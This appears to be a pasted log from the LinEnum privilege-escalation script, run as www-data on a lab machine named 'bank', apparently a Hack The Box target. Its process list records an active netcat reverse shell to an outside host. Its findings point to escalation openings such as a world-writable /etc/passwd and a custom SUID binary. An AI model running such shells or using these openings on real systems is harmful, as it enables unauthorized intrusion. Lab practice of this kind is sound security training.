Untitled

a guest
Sep 18th, 2017

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
#

Debug Info
thorough tests = enabled


Scan started at:
Tue Sep 19 03:15:16 EEST 2017


### SYSTEM ##############################################
Kernel information:
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux


Kernel information (continued):
Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017


Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"


Hostname:
bank


### USER/GROUP ##########################################
Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Users that have previously logged onto the system:
Username Port From Latest
root tty1 Fri Jun 16 07:44:56 +0300 2017
chris pts/0 192.168.147.1 Sun May 28 22:16:12 +0300 2017


Who else is logged on:
03:15:16 up 16:14, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT


Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(syslog) gid=104(syslog) groups=104(syslog),4(adm)
uid=102(messagebus) gid=106(messagebus) groups=106(messagebus)
uid=103(landscape) gid=109(landscape) groups=109(landscape)
uid=1000(chris) gid=1000(chris) groups=1000(chris),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=112(bind) groups=112(bind)
uid=106(mysql) gid=114(mysql) groups=114(mysql)


Sample entries from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
root:x:0:0:root:/root:/bin/bash
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash


Super user account(s):
root


Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K May 28 22:13 .
drwxr-xr-x 21 root root 4.0K Jun 15 08:12 ..
drwxr-xr-x 3 chris chris 4.0K Jun 14 18:21 chris


Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access


World-readable files within /home:
-rw-r--r-- 1 chris chris 675 May 28 22:13 /home/chris/.profile
-rw-r--r-- 1 chris chris 3637 May 28 22:13 /home/chris/.bashrc
-rw-rw-r-- 1 chris chris 33 May 29 14:52 /home/chris/user.txt
-rw-r--r-- 1 chris chris 220 May 28 22:13 /home/chris/.bash_logout


Home directory contents:
total 16K
drwxr-xr-x 4 root root 4.0K May 28 22:48 .
drwxr-xr-x 14 root root 4.0K May 29 18:41 ..
drwxr-xr-x 6 www-data www-data 4.0K Jun 15 09:21 bank
drwxr-xr-x 2 root root 4.0K Jun 14 18:02 html


Root is allowed to login via SSH:
PermitRootLogin yes


### ENVIRONMENTAL #######################################
Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/var/www/bank/uploads
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


Current umask value:
0022
u=rwx,g=rx,o=rx


umask value as specified in /etc/login.defs:
UMASK 022


Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
Cron jobs:
-rw-r--r-- 1 root root 722 Feb 9 2013 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 May 28 22:40 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw-r--r-- 1 root root 510 Feb 9 2017 php5

/etc/cron.daily:
total 76
drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 625 May 9 19:15 apache2
-rwxr-xr-x 1 root root 376 Apr 4 2014 apport
-rwxr-xr-x 1 root root 15481 Apr 10 2014 apt
-rwxr-xr-x 1 root root 314 Feb 18 2014 aptitude
-rwxr-xr-x 1 root root 355 Jun 4 2013 bsdmainutils
-rwxr-xr-x 1 root root 256 Mar 7 2014 dpkg
-rwxr-xr-x 1 root root 372 Jan 22 2014 logrotate
-rwxr-xr-x 1 root root 1261 Sep 23 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 20 2013 mlocate
-rwxr-xr-x 1 root root 249 Feb 17 2014 passwd
-rwxr-xr-x 1 root root 2417 May 13 2013 popularity-contest
-rwxr-xr-x 1 root root 214 Oct 7 2014 update-notifier-common
-rwxr-xr-x 1 root root 328 Jul 18 2014 upstart

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 May 28 21:51 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 May 28 21:51 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder

/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Sep 23 2014 man-db
-rwxr-xr-x 1 root root 211 Oct 7 2014 update-notifier-common


Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING ##########################################
Network & IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:aa:b1:0c
inet addr:10.10.10.29 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feaa:b10c/64 Scope:Link
inet6 addr: dead:beef::250:56ff:feaa:b10c/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6318125 errors:4580 dropped:8585 overruns:0 frame:0
TX packets:6275341 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1581182731 (1.5 GB) TX bytes:1177779161 (1.1 GB)
Interrupt:19 Base address:0x2000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:3373 errors:0 dropped:0 overruns:0 frame:0
TX packets:3373 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:347776 (347.7 KB) TX bytes:347776 (347.7 KB)


ARP history:
? (10.10.10.2) at 00:50:56:aa:e6:4b [ether] on eth0


Nameserver(s):
nameserver 10.10.10.29
nameserver 192.168.1.7


Default route:
default 10.10.10.2 0.0.0.0 UG 0 0 0 eth0


Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 10.10.10.29:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.29:41626 10.10.14.3:6969 ESTABLISHED 2203/sh
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::53 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:953 :::* LISTEN -
tcp6 0 0 10.10.10.29:80 10.10.14.3:57208 TIME_WAIT -
tcp6 0 0 10.10.10.29:80 10.10.14.3:57204 TIME_WAIT -
tcp6 0 0 10.10.10.29:80 10.10.14.3:57168 ESTABLISHED -


Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 10.10.10.29:53 0.0.0.0:* -
udp 0 0 127.0.0.1:53 0.0.0.0:* -
udp6 0 0 :::53 :::* -


### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 4312 2508 ? Ss Sep18 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S Sep18 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Sep18 0:50 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S Sep18 0:02 [rcu_sched]
root 8 0.0 0.0 0 0 ? S Sep18 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S Sep18 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S Sep18 0:00 [watchdog/0]
root 11 0.0 0.0 0 0 ? S Sep18 0:00 [kdevtmpfs]
root 12 0.0 0.0 0 0 ? S< Sep18 0:00 [netns]
root 13 0.0 0.0 0 0 ? S< Sep18 0:00 [perf]
root 14 0.0 0.0 0 0 ? S Sep18 0:00 [khungtaskd]
root 15 0.0 0.0 0 0 ? S< Sep18 0:00 [writeback]
root 16 0.0 0.0 0 0 ? SN Sep18 0:00 [ksmd]
root 17 0.0 0.0 0 0 ? SN Sep18 0:00 [khugepaged]
root 18 0.0 0.0 0 0 ? S< Sep18 0:00 [crypto]
root 19 0.0 0.0 0 0 ? S< Sep18 0:00 [kintegrityd]
root 20 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< Sep18 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< Sep18 0:00 [ata_sff]
root 23 0.0 0.0 0 0 ? S< Sep18 0:00 [md]
root 24 0.0 0.0 0 0 ? S< Sep18 0:00 [devfreq_wq]
root 26 0.0 0.0 0 0 ? S Sep18 0:06 [kworker/0:1]
root 28 0.0 0.0 0 0 ? S Sep18 0:01 [kswapd0]
root 29 0.0 0.0 0 0 ? S< Sep18 0:00 [vmstat]
root 30 0.0 0.0 0 0 ? S Sep18 0:00 [fsnotify_mark]
root 31 0.0 0.0 0 0 ? S Sep18 0:00 [ecryptfs-kthrea]
root 47 0.0 0.0 0 0 ? S< Sep18 0:00 [kthrotld]
root 48 0.0 0.0 0 0 ? S< Sep18 0:00 [acpi_thermal_pm]
root 49 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 50 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 52 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 53 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 54 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 55 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 56 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 57 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 58 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_0]
root 59 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_0]
root 60 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_1]
root 61 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_1]
root 64 0.0 0.0 0 0 ? S< Sep18 0:00 [ipv6_addrconf]
root 77 0.0 0.0 0 0 ? S< Sep18 0:00 [deferwq]
root 78 0.0 0.0 0 0 ? S< Sep18 0:00 [charger_manager]
root 80 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 81 0.0 0.0 0 0 ? S Sep18 0:00 [kworker/0:2]
root 136 0.0 0.0 0 0 ? S< Sep18 0:00 [kworker/0:1H]
root 137 0.0 0.0 0 0 ? S< Sep18 0:00 [kpsmoused]
root 138 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt_poll_0]
root 139 0.0 0.0 0 0 ? S< Sep18 0:00 [mpt/0]
root 141 0.0 0.0 0 0 ? S Sep18 0:00 [scsi_eh_2]
root 142 0.0 0.0 0 0 ? S< Sep18 0:00 [scsi_tmf_2]
root 143 0.0 0.0 0 0 ? S< Sep18 0:00 [bioset]
root 169 0.0 0.0 0 0 ? S Sep18 0:00 [jbd2/sda1-8]
root 170 0.0 0.0 0 0 ? S< Sep18 0:00 [ext4-rsv-conver]
root 299 0.0 0.1 3160 1312 ? S Sep18 0:00 upstart-udev-bridge --daemon
root 303 0.0 0.1 12356 1948 ? Ss Sep18 0:00 /lib/systemd/systemd-udevd --daemon
message+ 366 0.0 0.1 4268 1144 ? Ss Sep18 0:00 dbus-daemon --system --fork
root 393 0.0 0.1 3996 1664 ? Ss Sep18 0:00 /lib/systemd/systemd-logind
syslog 407 0.0 0.1 30492 1780 ? Ssl Sep18 0:00 rsyslogd
root 436 0.0 0.1 3164 1044 ? S Sep18 0:00 upstart-file-bridge --daemon
root 479 0.0 0.0 0 0 ? S< Sep18 0:00 [ttm_swap]
root 649 0.0 0.0 2888 4 ? S Sep18 0:00 upstart-socket-bridge --daemon
root 781 0.0 0.1 4660 1728 tty4 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty4
root 784 0.0 0.1 4660 1688 tty5 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty5
root 789 0.0 0.1 4660 1724 tty2 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty2
root 790 0.0 0.1 4660 1732 tty3 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty3
root 793 0.0 0.1 4660 1592 tty6 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty6
root 826 0.0 0.2 7828 2760 ? Ss Sep18 0:00 /usr/sbin/sshd -D
daemon 827 0.0 0.0 2656 0 ? Ss Sep18 0:00 atd
root 828 0.0 0.1 3068 1904 ? Ss Sep18 0:00 cron
root 875 0.0 0.1 2212 1356 ? Ss Sep18 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
mysql 909 0.0 3.4 327756 35612 ? Ssl Sep18 0:23 /usr/sbin/mysqld
bind 936 0.0 1.3 46152 13416 ? Ssl Sep18 0:01 /usr/sbin/named -u bind
root 1025 0.0 1.6 103516 16616 ? Ss Sep18 0:03 /usr/sbin/apache2 -k start
www-data 1028 0.0 0.3 21540 3544 ? S Sep18 0:01 /usr/sbin/apache2 -k start
root 1074 0.0 0.1 4660 1824 tty1 Ss+ Sep18 0:00 /sbin/getty -8 38400 tty1
root 1197 0.0 0.0 0 0 ? S Sep18 0:00 [kauditd]
www-data 2047 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2061 0.0 0.9 103604 9428 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2065 0.0 1.1 103720 11348 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2111 0.0 1.0 103736 10768 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2116 0.0 0.6 103596 6864 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2119 0.0 0.5 103588 5656 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2124 0.0 0.9 103596 9568 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2132 0.0 0.9 103588 9816 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2164 0.0 0.9 103588 9812 ? S 02:17 0:00 /usr/sbin/apache2 -k start
www-data 2177 0.0 1.0 103588 10360 ? S 02:19 0:00 /usr/sbin/apache2 -k start
root 2198 0.0 0.0 0 0 ? S 02:54 0:00 [kworker/u16:0]
root 2201 0.0 0.0 0 0 ? S 03:02 0:00 [kworker/u16:2]
www-data 2202 0.0 0.0 2284 628 ? S 03:06 0:00 sh -c nc -e /bin/sh 10.10.14.3 6969
www-data 2203 0.0 0.1 2284 1368 ? S 03:06 0:00 sh
www-data 3430 0.3 0.2 3512 2840 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
www-data 3762 0.0 0.1 3504 1956 ? S 03:15 0:00 /bin/bash ./escalate.sh -t
www-data 3763 0.0 0.1 3156 1968 ? R 03:15 0:00 ps aux


Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 986672 May 16 15:54 /bin/bash
-rwxr-xr-x 1 root root 259552 Feb 7 2017 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 235064 Feb 7 2017 /lib/systemd/systemd-udevd
-rwxr-xr-x 2 root root 26756 Nov 24 2016 /sbin/getty
-rwxr-xr-x 1 root root 252080 Jul 18 2014 /sbin/init
-rwxr-xr-x 1 root root 597796 May 9 19:16 /usr/sbin/apache2
-rwxr-xr-x 1 root root 10724544 Apr 25 19:57 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 573516 Apr 13 11:12 /usr/sbin/named
-rwxr-xr-x 1 root root 834648 Aug 11 2016 /usr/sbin/sshd


/etc/init.d/ binary permissions:
total 200
drwxr-xr-x 2 root root 4096 Jun 15 08:12 .
drwxr-xr-x 94 root root 4096 Sep 18 11:00 ..
-rw-r--r-- 1 root root 0 Aug 3 2016 .legacy-bootordering
-rw-r--r-- 1 root root 2427 Mar 13 2014 README
-rwxr-xr-x 1 root root 2243 Apr 3 2014 acpid
-rwxr-xr-x 1 root root 9974 Jan 7 2014 apache2
-rwxr-xr-x 1 root root 4125 Mar 16 2017 apparmor
-rwxr-xr-x 1 root root 2801 May 18 2016 apport
-rwxrwxr-x 1 root root 1071 Sep 8 2013 atd
-rwxr-xr-x 1 root root 3451 Apr 13 11:07 bind9
-rwxr-xr-x 1 root root 1919 Jan 18 2011 console-setup
lrwxrwxrwx 1 root root 21 May 28 21:51 cron -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2813 Nov 25 2014 dbus
-rwxr-xr-x 1 root root 1217 Mar 7 2013 dns-clean
lrwxrwxrwx 1 root root 21 Mar 14 2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1105 May 13 2015 grub-common
-rwxr-xr-x 1 root root 1329 Mar 13 2014 halt
-rwxr-xr-x 1 root root 1864 Nov 12 2012 irqbalance
-rwxr-xr-x 1 root root 1293 Mar 13 2014 killprocs
-rwxr-xr-x 1 root root 1990 Jan 22 2013 kmod
-rwxr-xr-x 1 root root 5491 Feb 19 2014 mysql
-rwxr-xr-x 1 root root 4479 Mar 20 2014 networking
-rwxr-xr-x 1 root root 1581 Feb 17 2016 ondemand
-rwxr-xr-x 1 root root 561 Apr 21 2015 pppd-dns
-rwxr-xr-x 1 root root 1192 May 27 2013 procps
-rwxr-xr-x 1 root root 6120 Mar 13 2014 rc
-rwxr-xr-x 1 root root 782 Mar 13 2014 rc.local
-rwxr-xr-x 1 root root 117 Mar 13 2014 rcS
-rwxr-xr-x 1 root root 639 Mar 13 2014 reboot
-rwxr-xr-x 1 root root 2918 Jun 13 2014 resolvconf
-rwxr-xr-x 1 root root 4395 Jan 20 2016 rsync
-rwxr-xr-x 1 root root 2913 Dec 4 2013 rsyslog
-rwxr-xr-x 1 root root 1226 Jul 22 2013 screen-cleanup
-rwxr-xr-x 1 root root 3920 Mar 13 2014 sendsigs
-rwxr-xr-x 1 root root 590 Mar 13 2014 single
-rw-r--r-- 1 root root 4290 Mar 13 2014 skeleton
-rwxr-xr-x 1 root root 4077 May 2 2014 ssh
-rwxr-xr-x 1 root root 731 Feb 5 2014 sudo
-rwxr-xr-x 1 root root 6173 Apr 14 2014 udev
-rwxr-xr-x 1 root root 2721 Mar 13 2014 umountfs
-rwxr-xr-x 1 root root 2260 Mar 13 2014 umountnfs.sh
-rwxr-xr-x 1 root root 1872 Mar 13 2014 umountroot
-rwxr-xr-x 1 root root 1361 Dec 6 2013 unattended-upgrades
-rwxr-xr-x 1 root root 3111 Mar 13 2014 urandom


### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.9p5


MYSQL version:
mysql Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3


Apache version:
Server version: Apache/2.4.7 (Ubuntu)
Server built: May 9 2017 16:13:38


Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
fcgid_module (shared)
filter_module (shared)
include_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php5_module (shared)
rewrite_module (shared)
setenvif_module (shared)
status_module (shared)
suexec_module (shared)


### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc


Installed compilers:
ii g++ 4:4.8.2-1ubuntu6 i386 GNU C++ compiler
ii g++-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C++ compiler
ii gcc 4:4.8.2-1ubuntu6 i386 GNU C compiler
ii gcc-4.8 4.8.4-2ubuntu1~14.04.3 i386 GNU C compiler


Can we read/write sensitive files:
-rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
-rw-r--r-- 1 root root 707 May 28 22:40 /etc/group
-rw-r--r-- 1 root root 665 Feb 20 2014 /etc/profile
-rw-r----- 1 root shadow 895 Jun 14 18:16 /etc/shadow


SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount


GUID files:
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-lock
-rwxr-sr-x 1 root utmp 406700 Nov 7 2013 /usr/bin/screen
-rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 329144 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 53516 May 17 02:38 /usr/bin/chage
-rwxr-sr-x 1 root tty 18056 Nov 24 2016 /usr/bin/wall
-rwxr-sr-x 1 root shadow 18208 May 17 02:38 /usr/bin/expiry
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-unlock
-rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
-rwxr-sr-x 1 root mail 13960 Dec 7 2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
-rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd


World-writable files (excluding /proc):
-rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
-rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access


Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 144 May 28 22:13 /etc/kernel-img.conf
-rw-r--r-- 1 root root 321 Apr 16 2014 /etc/blkid.conf
-rw-r--r-- 1 root root 191 Dec 4 2013 /etc/libaudit.conf
